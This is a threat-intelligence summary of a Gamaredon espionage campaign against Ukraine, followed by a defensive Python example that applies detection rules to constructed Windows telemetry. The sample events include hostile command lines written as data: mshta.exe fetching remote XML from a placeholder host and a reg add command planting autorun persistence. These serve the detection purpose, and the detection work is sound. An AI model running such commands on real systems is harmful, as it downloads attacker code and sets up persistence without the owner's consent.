2022-09-22

Gamaredon APT Targets Ukraine with Infostealer Campaign

Industry: N/A | Level: Tactical | Source: Cisco Talos

Researchers from Cisco Talos have uncovered an espionage campaign attributed to the Russian threat group Gamaredon (aka IRON TILDEN, Primitive Bear, ACTINIUM, Armageddon, Shuckworm, and DEV-0157) that targets Ukrainian entities with a new information-stealing malware. The attack begins with a phishing email carrying a weaponized document whose malicious macro downloads a RAR archive. The archive typically contains an LNK file that launches MSHTA.exe to parse a remote XML file. This leads to the execution of a PowerShell script that performs a variety of tasks, including system reconnaissance, executing a VBScript object, capturing the victim's screen, setting up persistence in the autorun registry key, and downloading the attacker's custom infostealer malware. Cisco Talos has not observed this infostealer in previous Gamaredon campaigns; with low confidence, researchers assess that the malware is associated with the group's Giddome backdoor family.

Anvilogic Scenario:

  • Malicious Document Delivering Malware

Anvilogic Use Cases:

  • Wscript/Cscript Execution
  • MSHTA.exe execution
  • Network Connection with Suspicious Folder
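As an added example (not part of the Anvilogic write-up or the Talos report), the following Python snippet implements rule logic for the three use cases listed above, run against a handful of constructed process-creation and network-connection events modelled on the chain described in the summary: an LNK launching mshta.exe with a remote URL, mshta.exe spawning PowerShell, wscript.exe running a VBScript, a Run-key write, and a network connection from a binary in a user-writable folder. The event schema, all file paths, the domain example.invalid, and the choice of "suspicious folders" are assumptions made for the example; real detection content would map these onto the telemetry fields of the EDR or SIEM in use.

```python
import re

# Constructed sample telemetry (not from the Talos report). Each event is either a
# process-creation record (parent, image, cmdline) or a network-connection record
# (image, dest). Paths, hostnames and file names are illustrative placeholders.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe http://example.invalid/update.xml"},          # LNK -> mshta, remote XML
    {"id": 2, "type": "process", "parent": r"C:\Windows\System32\mshta.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Users\Public\stage.ps1"},  # mshta -> PowerShell
    {"id": 3, "type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Users\Public\info.vbs"},                 # VBScript object executed
    {"id": 4, "type": "process", "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\Users\Public\stage.ps1"},  # autorun persistence
    {"id": 5, "type": "network", "image": r"C:\Users\alice\AppData\Local\Temp\svc.exe",
     "dest": "203.0.113.10:443"},                                          # download from a temp-folder binary
    {"id": 6, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" C:\Users\alice\Documents\report.docx'},   # benign
    {"id": 7, "type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest": "198.51.100.5:443"},                                          # benign
    {"id": 8, "type": "process", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\local.hta"},                   # mshta without remote content
]

# Patterns used by the rules. Folder list is an assumption about what
# "suspicious folder" should cover; tune it to the environment.
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.IGNORECASE)


def basename(path):
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the list of rule names that fire on a single event."""
    hits = []
    if event["type"] == "process":
        image = basename(event["image"])
        parent = basename(event["parent"])
        cmd = event["cmdline"]
        # Use case: MSHTA.exe execution, with a stronger signal when it pulls remote content.
        if image == "mshta.exe":
            hits.append("mshta_execution")
            if REMOTE_URL.search(cmd):
                hits.append("mshta_remote_content")
        # Use case: Wscript/Cscript execution.
        if image in ("wscript.exe", "cscript.exe"):
            hits.append("script_host_execution")
        # Chain step: mshta.exe handing off to PowerShell.
        if parent == "mshta.exe" and image == "powershell.exe":
            hits.append("mshta_spawns_powershell")
        # Chain step: persistence via the autorun (Run/RunOnce) registry key.
        if image in ("reg.exe", "powershell.exe") and RUN_KEY.search(cmd):
            hits.append("autorun_persistence")
    elif event["type"] == "network":
        # Use case: network connection from a binary living in a user-writable folder.
        if USER_WRITABLE.search(event["image"]):
            hits.append("network_from_suspicious_folder")
    return hits


def scan(events):
    """Map event id -> rule hits for every event that triggered at least one rule."""
    return {e["id"]: hits for e in events if (hits := evaluate(e))}


def stages_observed(events):
    """Sorted list of distinct rules that fired across the whole batch; several
    distinct stages from one host in a short window is the correlation worth alerting on."""
    return sorted({name for hits in scan(events).values() for name in hits})


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(event_id, hits)
    print("stages:", stages_observed(SAMPLE_EVENTS))
```

Each rule on its own is noisy (mshta.exe and wscript.exe have legitimate uses), which is why `stages_observed` is there: the value comes from seeing several of these stages together on one host, not from any single hit.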
